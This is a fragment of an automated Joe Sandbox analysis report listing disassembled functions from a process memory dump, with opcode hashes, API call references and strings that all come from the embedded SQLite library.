                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                            • API String ID: 3510742995-3764764234
                                                            • Opcode ID: ad0c9925f5f763d59eb461d465fc699a4c272932b870f6f2613455510c5e3eb7
                                                            • Instruction ID: 4250ff09d78742e1ad4136afa6e6ed76f5ab23a6f178ccced3002e4017ccc6f0
                                                            • Opcode Fuzzy Hash: ad0c9925f5f763d59eb461d465fc699a4c272932b870f6f2613455510c5e3eb7
                                                            • Instruction Fuzzy Hash: 36A124B3A0E2D18AD7668B68D4946BE7B91FB81780F044135DF8AC3691EF7CE546C710
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
                                                            • API String ID: 3510742995-879093740
                                                            • Opcode ID: c9e795dc4d123c262b175c945ba407815cf108cd462a88b84e0acb70f777678b
                                                            • Instruction ID: 28fb70633d7a6b07ebad418562a8045bd78abb3651c4d565113e789c2a80c536
                                                            • Opcode Fuzzy Hash: c9e795dc4d123c262b175c945ba407815cf108cd462a88b84e0acb70f777678b
                                                            • Instruction Fuzzy Hash: 60E1BDA2F0AB82EAEB12CB39C9806BD27A5FB44B84F055275DE4C177A5DF38E451C340
                                                            APIs
                                                            Strings
                                                            • foreign key on %s should reference only one column of table %T, xrefs: 00007FFBA46034F5
                                                            • unknown column "%s" in foreign key definition, xrefs: 00007FFBA460380C
                                                            • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FFBA460351E
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                            • API String ID: 438689982-272990098
                                                            • Opcode ID: 0f1ae6706e2e64d0062df6b9c75ebbb5e997ac9397ddfcf155c0f8c1908f2499
                                                            • Instruction ID: a8838e50c1ac76d2f935dc0fd2e43f49ac1c49153e9bd42631fafe99b8110fda
                                                            • Opcode Fuzzy Hash: 0f1ae6706e2e64d0062df6b9c75ebbb5e997ac9397ddfcf155c0f8c1908f2499
                                                            • Instruction Fuzzy Hash: 28D1F4E2A0AB81D2EB668B29D88477927A1FB85BC5F44A175DE5D037A5DF3CE580C300
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %sSCALAR SUBQUERY %d$CORRELATED $Expression tree is too large (maximum depth %d)$REUSE SUBQUERY %d
                                                            • API String ID: 0-875495356
                                                            • Opcode ID: b84f660d529b277a8f07fa2363deb352529174e458e0e2df612b0ec082612bfb
                                                            • Instruction ID: a2e0f4182721068632973f2cbb38f215883f2055d8e1badf1d694f973502ed9b
                                                            • Opcode Fuzzy Hash: b84f660d529b277a8f07fa2363deb352529174e458e0e2df612b0ec082612bfb
                                                            • Instruction Fuzzy Hash: CFD1ADB2A19781CBE756CF36DA8126A77A1FB89784F049235DE4D43BA5DF38E490C700
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                            • API String ID: 438689982-3764764234
                                                            • Opcode ID: 1387ee26437fe0bb48c9d3c51bd20c38da24827126420e40ab13e574651dee3f
                                                            • Instruction ID: 9055b63feae9807204c2a5e1e9afad1ab7e0b419061462c4a865789063d66afd
                                                            • Opcode Fuzzy Hash: 1387ee26437fe0bb48c9d3c51bd20c38da24827126420e40ab13e574651dee3f
                                                            • Instruction Fuzzy Hash: A6B1CFB2A0A696C6D762CB2AE084B7B77A5FB48B84F114035DE4D47BA6DF39E440C700
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                            • API String ID: 438689982-2063813899
                                                            • Opcode ID: 547cb7496cd76680ffb143b9acd7cbda9707e93bc72d9f8c59e08c6fdf96c3c9
                                                            • Instruction ID: 0e49969955423ece69d61705dea1a3af01afc1a81b39e2c11e17601809e397e5
                                                            • Opcode Fuzzy Hash: 547cb7496cd76680ffb143b9acd7cbda9707e93bc72d9f8c59e08c6fdf96c3c9
                                                            • Instruction Fuzzy Hash: EE91D1A2A0AB89C2DB52CF65D4946BD77A4FB48B80F459235DF8D077A6DF38E048C700
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                            • API String ID: 3510742995-3764764234
                                                            • Opcode ID: 60379f6257e9eb3b8e9ab340d4ff75cb59f3ec471e2ee9b80591df60d0839046
                                                            • Instruction ID: de593d8da42d1b84f37a047cf972ff9c79ce502fec515398d711f540d254e986
                                                            • Opcode Fuzzy Hash: 60379f6257e9eb3b8e9ab340d4ff75cb59f3ec471e2ee9b80591df60d0839046
                                                            • Instruction Fuzzy Hash: 3191C0A3A09A86CAC721DB29E9806AB7BB0FB44B84F044132DF8947B65DF3CD155C740
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: 831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                            • API String ID: 3510742995-1759904473
                                                            • Opcode ID: defddaeb9fd67739c41f5e42114a3d13a060e9336ce3bb55b86e51b19b0f97b8
                                                            • Instruction ID: 184a5ebe6eae6fee01021bf24e94bff224f908cc57ace715d53c36f7a54683e2
                                                            • Opcode Fuzzy Hash: defddaeb9fd67739c41f5e42114a3d13a060e9336ce3bb55b86e51b19b0f97b8
                                                            • Instruction Fuzzy Hash: E9327BB2A0A642C6E751CF76D48426E77A2FF45B88F504136DE4D87BA9DF38E841CB40
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmp
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                            • API String ID: 3510742995-3764764234
                                                            • Opcode ID: 96f507d9b9875c8520d21979787bbb00bf3c712726093243c0ed66bdc3c8419c
                                                            • Instruction ID: 74693ac03355196ed2f0a6696882d3af51933e58be9464bd71bb336823121f80
                                                            • Opcode Fuzzy Hash: 96f507d9b9875c8520d21979787bbb00bf3c712726093243c0ed66bdc3c8419c
                                                            • Instruction Fuzzy Hash: 0BF1A1A2E0A692C6EB66CB35D8807BE27A1FB04B98F144035DE4D577A5DF7CE881C340
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: hidden$vtable constructor called recursively: %s$vtable constructor did not declare schema: %s$vtable constructor failed: %s
                                                            • API String ID: 3510742995-1299490920
                                                            • Opcode ID: 24d3f548164c3c727413c44823ce5731ff3500e30b8b2b32f783c6d282a2637e
                                                            • Instruction ID: e4e3f232217f49aaf619023056ad60a06f108498cf142f5f5539b2ea003de549
                                                            • Opcode Fuzzy Hash: 24d3f548164c3c727413c44823ce5731ff3500e30b8b2b32f783c6d282a2637e
                                                            • Instruction Fuzzy Hash: D8F1EEA2A0AB86C1EB52CB29E88437A77A0FB44F95F445276DE9D077A5DF3CE445C300
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                            • API String ID: 3510742995-3764764234
                                                            • Opcode ID: 6317d1f0366df711ccbb85612adfa640f08fb7956397c07062b616eb10f3b511
                                                            • Instruction ID: 00c03ab83f4ea38b80ca76c0d8edf82ea882079aedbbe2a3bbeffa0d193cb76f
                                                            • Opcode Fuzzy Hash: 6317d1f0366df711ccbb85612adfa640f08fb7956397c07062b616eb10f3b511
                                                            • Instruction Fuzzy Hash: D3F19EB260AB81C6D791DB25E4847AE7BA1F784B84F148036EE8E43765DF79E885C700
                                                            APIs
                                                            • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00007FFBA46268CC,?,?,00000000), ref: 00007FFBA46260A0
                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00007FFBA46268CC,?,?,00000000), ref: 00007FFBA46261E7
                                                            Similarity
                                                            • API ID: memcpymemset
                                                            • String ID: %.*z:%u$column%d$rowid
                                                            • API String ID: 1297977491-2903559916
                                                            • Opcode ID: 56bdec2d0e16705477e103332ad0cfd1f19f9ad61f15f0a566ed91b37e11c37b
                                                            • Instruction ID: c726f9bc247077d0a532c4cb42d1f42a12ca1000e09ec3d22fbdcc5f36ad6931
                                                            • Opcode Fuzzy Hash: 56bdec2d0e16705477e103332ad0cfd1f19f9ad61f15f0a566ed91b37e11c37b
                                                            • Instruction Fuzzy Hash: 31C1F3A2E0B682D5EA568B29D9883BA67A0FF61B84F44A175DE4D077E5DF3CE401C300
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                            • API String ID: 3510742995-3764764234
                                                            • Opcode ID: f95b54a4046d8bc0bd595eb3b13625d74fc78367791bef29465ec966645c1770
                                                            • Instruction ID: 993277d4edb75f1f8c469e1f480258a50eb9e98abede47da10698a34abf77805
                                                            • Opcode Fuzzy Hash: f95b54a4046d8bc0bd595eb3b13625d74fc78367791bef29465ec966645c1770
                                                            • Instruction Fuzzy Hash: D081EDB2A09A92D7E756CB29D4847AE7BA4FB48B84F008036EF4D477A1DF38E455C700
                                                            APIs
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000001,?,00000000,00000000,00007FFBA46398A8,?,?,?,00007FFBA4639C38), ref: 00007FFBA4639767
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000001,?,00000000,00000000,00007FFBA46398A8,?,?,?,00007FFBA4639C38), ref: 00007FFBA4639781
                                                            • memcpy.VCRUNTIME140(?,?,?,?,00000001,?,00000000,00000000,00007FFBA46398A8,?,?,?,00007FFBA4639C38), ref: 00007FFBA4639818
                                                            Similarity
                                                            • API ID: strncmp$memcpy
                                                            • String ID: CRE$INS
                                                            • API String ID: 2549481713-4116259516
                                                            • Opcode ID: 9c94cafef7605850ca711360ee4e65a6f3a743faef5e2085b3389ab44af66a74
                                                            • Instruction ID: aeaf3114a3fe8fedfc21ef96e005c606cc68c1568e31d654952b9b5a8df485ae
                                                            • Opcode Fuzzy Hash: 9c94cafef7605850ca711360ee4e65a6f3a743faef5e2085b3389ab44af66a74
                                                            • Instruction Fuzzy Hash: 0C51A0A1B0B682C1FA569F3AD89427922A0BF81FD0F546575CE9D477E1DE3CE40ACB00
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                            • API String ID: 3510742995-3764764234
                                                            • Opcode ID: 72ec62ebb50cb5be32859e59c3a317c5a0b90d92080e9b48b0985e2f720ee76c
                                                            • Instruction ID: 212f296628226a293bb0c06b70e6d9f571fc9940e3a5128163dc7cbf16107cb3
                                                            • Opcode Fuzzy Hash: 72ec62ebb50cb5be32859e59c3a317c5a0b90d92080e9b48b0985e2f720ee76c
                                                            • Instruction Fuzzy Hash: DD51E1B2609BC2C6CB11CB69E4849AE7BA1F744B84F144136EE8E43B65DB3CD095CB11
                                                            APIs
                                                            • memcmp.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 00007FFBA45BDF42
                                                            Similarity
                                                            • API ID: memcmp
                                                            • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                            • API String ID: 1475443563-3764764234
                                                            • Opcode ID: a6624fa4cd18243959224f66b77d2d35bfc1efc769bcdb0de4b0009a4ea19b69
                                                            • Instruction ID: 448f1ca9b3fe9b20ae04720aa7e3be4d94fa27fcf3a95cf350e550d6bbca32c6
                                                            • Opcode Fuzzy Hash: a6624fa4cd18243959224f66b77d2d35bfc1efc769bcdb0de4b0009a4ea19b69
                                                            • Instruction Fuzzy Hash: 61F17FB2B05642DBE765CB7AC5806AD37A1FB44788B144035DF0D97BA4EF78E816C740
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID:
                                                            • API String ID: 438689982-0
                                                            • Opcode ID: 47bbe8ba92e191afe8651bc5c485290a6e5130f0fb9df520d9df69e16ec27a69
                                                            • Instruction ID: 8de575e89915d33910576dcc0d95b9e8f358312761ae1832d6d8082fa045196a
                                                            • Opcode Fuzzy Hash: 47bbe8ba92e191afe8651bc5c485290a6e5130f0fb9df520d9df69e16ec27a69
                                                            • Instruction Fuzzy Hash: EE2151A2A19751D3DA659B2AF9811FAA365FB447C0B046135DFCE47FA6DF2DE050C300
                                                            APIs
                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,00000080,?,00000000,00007FFBA4634892), ref: 00007FFBA463456B
                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,00000080,?,00000000,00007FFBA4634892), ref: 00007FFBA46345EE
                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,00000080,?,00000000,00007FFBA4634892), ref: 00007FFBA46346DB
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: RETURNING may not use "TABLE.*" wildcards
                                                            • API String ID: 3510742995-2313493979
                                                            • Opcode ID: c9e3d9247948fcffe6fbe48892c6ebabfb1504096c290878a45634d262bc3d93
                                                            • Instruction ID: cc9ce4f7b9513a9ce18141ffeb8fe74ab89019c84868bd1ca5b8a64c59511840
                                                            • Opcode Fuzzy Hash: c9e3d9247948fcffe6fbe48892c6ebabfb1504096c290878a45634d262bc3d93
                                                            • Instruction Fuzzy Hash: 13B1B3A2A0ABC1C5E712CF29D9802A9B7A0FB45BA4F15A375DE6C077E5DF38E554C300
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                            • API String ID: 2221118986-3764764234
                                                            • Opcode ID: 814c724986b2a18afb897755327e1bee89b76cd8a67e7e84cf0f567dd5f8b430
                                                            • Instruction ID: 1989c8b468ab7a54ee0245f9d151c1a3573fbe269afa977574576e69c9c676b6
                                                            • Opcode Fuzzy Hash: 814c724986b2a18afb897755327e1bee89b76cd8a67e7e84cf0f567dd5f8b430
                                                            • Instruction Fuzzy Hash: C98177A3A0A1D189E362CF39E4805F93A91E711791F45413AEFCAC7291EB7CD987D320
                                                            APIs
                                                            • memcpy.VCRUNTIME140 ref: 00007FFBA463C415
                                                              • Part of subcall function 00007FFBA45A86C0: memcpy.VCRUNTIME140(?,?,%s at line %d of [%.10s],00007FFBA45A80C1), ref: 00007FFBA45A86F1
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: AND $<expr>$rowid
                                                            • API String ID: 3510742995-4041574714
                                                            • Opcode ID: 16f16b447587eb6b20782a5644277ec7c6a4c2f7cff12a977d291bb4bdc062f3
                                                            • Instruction ID: fc266f19464e5564ec5aad8e2a00f6249d3fe9ae7ad82c99c05cea9f74765cca
                                                            • Opcode Fuzzy Hash: 16f16b447587eb6b20782a5644277ec7c6a4c2f7cff12a977d291bb4bdc062f3
                                                            • Instruction Fuzzy Hash: B6A1BDB2A09682C5EB1ACF39D8C05383761EB55B88F546075EE0E473A9DF3CE885D780
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %s.%s$column%d$rowid
                                                            • API String ID: 0-1505470444
                                                            • Opcode ID: a81bc03f9b919587f08a4253e98ba2c81826b73d45dc8734a33354cdbc491ff4
                                                            • Instruction ID: 0f73ac5c271e247ab28645df56ca0d1dc6f2be9d41861619b0afbfd05fb55950
                                                            • Opcode Fuzzy Hash: a81bc03f9b919587f08a4253e98ba2c81826b73d45dc8734a33354cdbc491ff4
                                                            • Instruction Fuzzy Hash: D391ACB2A0AB81D1EA61CB29E8843A963A4FB45BB4F445376DEAC473E5DF38D445C700
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: $, $CREATE TABLE
                                                            • API String ID: 3510742995-3459038510
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                            • API String ID: 0-3764764234
                                                            Similarity
                                                            • API ID:
                                                            • String ID: , $index '%q'
                                                            • API String ID: 0-2319803734
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: out of memory$string or blob too big
                                                            • API String ID: 3510742995-2410398255
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: (join-%u)$(subquery-%u)
                                                            • API String ID: 3510742995-2916047017
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                            • API String ID: 2221118986-3764764234
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                            • API String ID: 3510742995-3764764234
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: $%!.15g$-
                                                            • API String ID: 3510742995-875264902
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                            • API String ID: 2221118986-3764764234
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                            • API String ID: 0-3764764234
                                                            Similarity
                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                            • String ID:
                                                            • API String ID: 2933794660-0
                                                            Similarity
                                                            • API ID: _msizerealloc
                                                            • String ID: failed memory resize %u to %u bytes
                                                            • API String ID: 2713192863-2134078882
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID:
                                                            • API String ID: 3510742995-0